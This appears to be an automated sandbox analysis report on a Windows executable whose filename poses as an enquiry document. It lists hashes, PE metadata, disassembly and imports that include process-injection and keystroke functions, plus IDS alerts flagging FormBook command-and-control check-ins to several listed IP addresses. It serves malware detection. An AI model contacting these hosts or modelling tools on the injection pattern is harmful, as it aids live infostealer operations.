                              Preview:.kq..PAU6..A...k.SW....SC...6XUUH34EOWXSTUE14PKPAU6XUUH34E.WXSZJ.?4.B.`.7..t.[]6o'*<3'$\.3*>/:Bx70hAA+o>6s....Y?/5oX;RqUH34EOW!R].xQS.v0&..82.R...u7?.N....0,.[.i5/.f,,?e33.E14PKPAUf.UU.25E....TUE14PKP.U4Y^TC34.KWXSTUE14P+DAU6HUUHC0EOW.STEE14RKPGU6XUUH32EOWXSTUEA0PKRAU6XUUJ3t.OWHSTEE14P[PAE6XUUH3$EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH3.1*/,STU.a0PK@AU6.QUH#4EOWXSTUE14PKPaU68UUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6X
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.1446536703683385
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:3T-ENQ-O-2024-10856.exe
                              File size:1'209'344 bytes
                              MD5:b2218f5d997fcad8ffd678a82ca0a9b2
                              SHA1:dc6ecd5bc824bfc835338af196dbdd04859f5ff8
                              SHA256:09ac6376b07a7b513e3250e66dda03697803dc861dab52ed3a297046b6f1e065
                              SHA512:bc8423d8e5682309c491c6d8f7b0fee90838f28f6db76afb37ad65097543148078b4df3a76c277fef7e9ca4f12d9ff51f175de0f6896d748dbb274bc23348675
                              SSDEEP:24576:P4lavt0LkLL9IMixoEgeaan8yDfkFS93DMYAioGVAq9MmCS:Kkwkn9IMHeaaTzlTMe6aPCS
                              TLSH:2D45CF0373DD83A5C3725273BA65BB01AEBB7C2546A1F59B2FD4093DF920122921E673
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........
                              Icon Hash:aaf3e3e3938382a0
                              Entrypoint:0x426bf7
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66E0CC9C [Tue Sep 10 22:47:56 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:bbac62fd99326ea68ec5a33b36925dd1
                              Instruction
                              call 00007F4A9122655Ch
                              jmp 00007F4A91219444h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push edi
                              push esi
                              mov esi, dword ptr [esp+10h]
                              mov ecx, dword ptr [esp+14h]
                              mov edi, dword ptr [esp+0Ch]
                              mov eax, ecx
                              mov edx, ecx
                              add eax, esi
                              cmp edi, esi
                              jbe 00007F4A912195CAh
                              cmp edi, eax
                              jc 00007F4A9121992Eh
                              bt dword ptr [004C0158h], 01h
                              jnc 00007F4A912195C9h
                              rep movsb
                              jmp 00007F4A912198DCh
                              cmp ecx, 00000080h
                              jc 00007F4A91219794h
                              mov eax, edi
                              xor eax, esi
                              test eax, 0000000Fh
                              jne 00007F4A912195D0h
                              bt dword ptr [004BA370h], 01h
                              jc 00007F4A91219AA0h
                              bt dword ptr [004C0158h], 00000000h
                              jnc 00007F4A9121976Dh
                              test edi, 00000003h
                              jne 00007F4A9121977Eh
                              test esi, 00000003h
                              jne 00007F4A9121975Dh
                              bt edi, 02h
                              jnc 00007F4A912195CFh
                              mov eax, dword ptr [esi]
                              sub ecx, 04h
                              lea esi, dword ptr [esi+04h]
                              mov dword ptr [edi], eax
                              lea edi, dword ptr [edi+04h]
                              bt edi, 03h
                              jnc 00007F4A912195D3h
                              movq xmm1, qword ptr [esi]
                              sub ecx, 08h
                              lea esi, dword ptr [esi+08h]
                              movq qword ptr [edi], xmm1
                              lea edi, dword ptr [edi+08h]
                              test esi, 00000007h
                              je 00007F4A91219625h
                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2012 UPD4 build 61030
                              • [RES] VS2012 UPD4 build 61030
                              • [LNK] VS2012 UPD4 build 61030
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6b6c | 0x17c | .rdata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5dfc8 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c20 | .reloc
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2770 | 0x40 | .rdata
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x858 | .rdata
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0x8be74 | 0x8c000 | 74af66fa540568c59b3868e78900e476 | False | 0.5690970284598215 | data | 6.681489717174931 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .rdata | 0x8d000 | 0x2c76a | 0x2c800 | 576c856afaad699ad9fe099fc6a9ce33 | False | 0.33122476299157305 | zlib compressed data | 5.781163507108141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .data | 0xba000 | 0x9f34 | 0x6200 | e6d2e204147f7cdc3055011093632f54 | False | 0.1639030612244898 | data | 2.004392861291539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rsrc | 0xc4000 | 0x5dfc8 | 0x5e000 | 3ebd7d545a8480bc026789917b0be9b6 | False | 0.930674451462766 | data | 7.8992778992168775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .reloc | 0x122000 | 0xa462 | 0xa600 | c2f6ddaeef894b7510c3be928eeae5dd | False | 0.5080948795180723 | data | 5.238496692777452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                               RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                               RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                               RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                               RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                               RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                               RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                               RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                               RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                               RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                               RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                               RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
                               RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                               RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                               RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                               RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                               RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                               RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                               RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                               RT_RCDATA | 0xcc7b8 | 0x552cf | data | | | 1.000332493500612
                               RT_GROUP_ICON | 0x121a88 | 0x76 | data | English | Great Britain | 0.6610169491525424
                               RT_GROUP_ICON | 0x121b00 | 0x14 | data | English | Great Britain | 1.25
                               RT_GROUP_ICON | 0x121b14 | 0x14 | data | English | Great Britain | 1.15
                               RT_GROUP_ICON | 0x121b28 | 0x14 | data | English | Great Britain | 1.25
                               RT_VERSION | 0x121b3c | 0xdc | data | English | Great Britain | 0.6181818181818182
                               RT_MANIFEST | 0x121c18 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                               DLL | Import
                               WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                               VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                               WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                               COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                               MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                               WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                               PSAPI.DLL | GetProcessMemoryInfo
                               IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                               USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                               UxTheme.dll | IsThemeActive
                               KERNEL32.dll | WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
                               USER32.dll | CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
                               GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                               COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                               ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                               SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                               ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                               OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                               Language of compilation system | Country where language is spoken | Map
                               English | Great Britain |
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-09-11T14:25:23.685445+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49710 | 3.33.130.190 | 80 | TCP
                               2024-09-11T14:25:40.404921+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49711 | 18.139.62.226 | 80 | TCP
                               2024-09-11T14:25:42.624519+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49712 | 18.139.62.226 | 80 | TCP
                               2024-09-11T14:25:45.179370+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49713 | 18.139.62.226 | 80 | TCP
                               2024-09-11T14:25:47.733495+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49714 | 18.139.62.226 | 80 | TCP
                               2024-09-11T14:25:53.594449+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49715 | 66.81.203.10 | 80 | TCP
                               2024-09-11T14:25:56.139554+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49716 | 66.81.203.10 | 80 | TCP
                               2024-09-11T14:25:58.725921+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49717 | 66.81.203.10 | 80 | TCP
                               2024-09-11T14:26:01.474977+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49718 | 66.81.203.10 | 80 | TCP
                               2024-09-11T14:26:07.700537+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49719 | 103.42.108.46 | 80 | TCP
                               2024-09-11T14:26:10.257388+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49720 | 103.42.108.46 | 80 | TCP
                               2024-09-11T14:26:12.825439+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49721 | 103.42.108.46 | 80 | TCP
                               2024-09-11T14:26:15.364789+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49722 | 103.42.108.46 | 80 | TCP
                               2024-09-11T14:26:20.868957+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49723 | 3.33.130.190 | 80 | TCP
                               2024-09-11T14:26:23.445179+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49724 | 3.33.130.190 | 80 | TCP
                               2024-09-11T14:26:26.521061+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49725 | 3.33.130.190 | 80 | TCP
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Sep 11, 2024 14:25:23.206465960 CEST | 49710 | 80 | 192.168.2.11 | 3.33.130.190
                               Sep 11, 2024 14:25:23.214799881 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.11
                               Sep 11, 2024 14:25:23.214909077 CEST | 49710 | 80 | 192.168.2.11 | 3.33.130.190
                               Sep 11, 2024 14:25:23.222680092 CEST | 49710 | 80 | 192.168.2.11 | 3.33.130.190
                               Sep 11, 2024 14:25:23.227878094 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.11
                               Sep 11, 2024 14:25:23.684370041 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.11
                               Sep 11, 2024 14:25:23.685355902 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.11
                               Sep 11, 2024 14:25:23.685445070 CEST | 49710 | 80 | 192.168.2.11 | 3.33.130.190
                               Sep 11, 2024 14:25:23.687897921 CEST | 49710 | 80 | 192.168.2.11 | 3.33.130.190
                               Sep 11, 2024 14:25:23.695733070 CEST | 80 | 49710 | 3.33.130.190 | 192.168.2.11
                               Sep 11, 2024 14:25:39.158472061 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:39.164093018 CEST | 80 | 49711 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:39.164169073 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:39.174925089 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:39.179981947 CEST | 80 | 49711 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:40.404805899 CEST | 80 | 49711 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:40.404829979 CEST | 80 | 49711 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:40.404844046 CEST | 80 | 49711 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:40.404921055 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:40.404961109 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:40.404974937 CEST | 80 | 49711 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:40.405054092 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:40.678906918 CEST | 49711 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:41.709125996 CEST | 49712 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:41.716350079 CEST | 80 | 49712 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:41.716420889 CEST | 49712 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:41.728666067 CEST | 49712 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:41.736953020 CEST | 80 | 49712 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:42.624095917 CEST | 80 | 49712 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:42.624303102 CEST | 80 | 49712 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:42.624519110 CEST | 49712 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:43.241626024 CEST | 49712 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:44.260293961 CEST | 49713 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:44.265310049 CEST | 80 | 49713 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:44.265424967 CEST | 49713 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:44.276164055 CEST | 49713 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:44.281867981 CEST | 80 | 49713 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:44.281879902 CEST | 80 | 49713 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:45.179224014 CEST | 80 | 49713 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:45.179290056 CEST | 80 | 49713 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:45.179369926 CEST | 49713 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:45.788427114 CEST | 49713 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:46.806888103 CEST | 49714 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:46.812819958 CEST | 80 | 49714 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:46.812944889 CEST | 49714 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:46.821049929 CEST | 49714 | 80 | 192.168.2.11 | 18.139.62.226
                               Sep 11, 2024 14:25:46.825907946 CEST | 80 | 49714 | 18.139.62.226 | 192.168.2.11
                               Sep 11, 2024 14:25:47.733251095 CEST | 80 | 49714 | 18.139.62.226 | 192.168.2.11
